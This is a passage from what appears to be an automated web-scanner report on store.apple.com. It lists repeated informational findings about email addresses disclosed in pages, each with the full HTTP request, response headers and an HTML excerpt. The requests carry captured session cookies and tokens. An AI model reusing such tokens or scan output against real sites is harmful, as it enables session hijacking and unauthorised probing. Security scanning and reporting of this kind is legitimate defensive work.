* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p,a,c,k
...[SNIP]...
title', '* This link opens in a new window');
   return jQuery(this);
}


/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights"
* by:
Scott Jehl (scott@filamentgroup.com)
Todd Parker (todd@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2007 Filament Group
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Description: Compares the heights of the first
...[SNIP]...

23.32. http://store.apple.com/us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us

Issue detail

The following email address was disclosed in the response:

Request

GET /us HTTP/1.1
Host: store.apple.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_ppv=100%2C100%2C1012%2C; s_orientationHeight=1012; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:00:10 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 17:56:52 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 17:46:52 GMT
x-request-id: c484db15-5d35-4ec6-9c21-7e3d4692c2b2
ETag: "f39ff3634bc4bb2d0928d4878bbbe4ce"
x-frame-options: sameorigin
Content-Length: 65545

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<title>Welcome to the Apple Store - Apple Store (U.S.)</title>

<meta http-equiv="X-UA
...[SNIP]...
dget.EmailSubscription');
var emailConfig= {

....    submitUrl: "https://mktws.apple.com/acdwsweb/ACDwsAction.do",
....    statusUrl: "https://mktws.apple.com/acdws/notify.js",
   emailPlaceholder: "example: steve@me.com",

.. .. urlArgs: {
.. .. .. .. /** Change locale to reflect your current locale. Do not edit any other values. **/
.. .. .. .. locale: 'en_us',
.. .. .. .. /** Don't edit these... **/
.. .. .. .. app
...[SNIP]...

23.33. http://store.apple.com/us/browse/home/shop_iphone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/browse/home/shop_iphone

Issue detail

The following email address was disclosed in the response:

Request

GET /us/browse/home/shop_iphone HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:23:01 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:16:28 GMT
ETag: "a8a268cf6a63097ce69ffd64f9376bc9"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:06:28 GMT
x-request-id: 5ff64834-2774-4a6e-87ae-49e1dfcb8e40
Content-Length: 44801
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<t
...[SNIP]...
dget.EmailSubscription');
var emailConfig= {

....    submitUrl: "https://mktws.apple.com/acdwsweb/ACDwsAction.do",
....    statusUrl: "https://mktws.apple.com/acdws/notify.js",
   emailPlaceholder: "example: steve@me.com",

.. .. urlArgs: {
.. .. .. .. /** Change locale to reflect your current locale. Do not edit any other values. **/
.. .. .. .. locale: 'en_us',
.. .. .. .. /** Don't edit these... **/
.. .. .. .. app
...[SNIP]...

23.34. http://store.apple.com/us/product/H0374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0374

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0374 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:05 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:30 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "d5eff677aab04d0e56110f0c0ecc6ec3"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:30 GMT
x-request-id: 1686aefd-3f5b-4432-b42f-de4b12b4e563
Content-Length: 98437
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Incase 13&quot; Neoprene Sleeve Plus for Macbook Pro - Apple
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.35. http://store.apple.com/us/product/H0614  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0614

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0614 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:07:49 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:49 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:49 GMT
x-request-id: 72204630-244b-4b84-bc7d-526fae5c420b
Content-Length: 78469
ETag: "3ac9cf93938e14c3f518e29d7802c658"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Philips JumpStart Attachable Battery Pack - Apple Store (U.S
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.36. http://store.apple.com/us/product/H0691VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0691VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0691VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:47 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:26 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:26 GMT
x-request-id: 4e931e52-2427-47a3-8d17-da26a0873298
Content-Length: 85048
ETag: "c65e38f44f64e7334488a8d189bb8a9f"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin iTrip Auto for iPod and iPhone - Apple Store (U.S.)<
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.37. http://store.apple.com/us/product/H0692VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0692VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0692VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:45 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:24 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:24 GMT
x-request-id: 2c207b9e-f588-4df4-aab8-1b5c1fb7f55e
Content-Length: 89528
ETag: "1c7edad98e2a4749637c220404ac2aa2"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin RoadTrip FM Transmitter with SmartScan RDS + Power -
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.38. http://store.apple.com/us/product/H0693VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0693VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0693VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:51 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:32 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:32 GMT
x-request-id: e4de068a-1101-44d4-8411-01307f06efef
Content-Length: 86614
ETag: "af352ec892ea67105ee5f8f52d7b485b"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin TuneFlex AUX Hands-free for iPhone and iPod - Apple
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.39. http://store.apple.com/us/product/H0694VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H0694VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H0694VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; 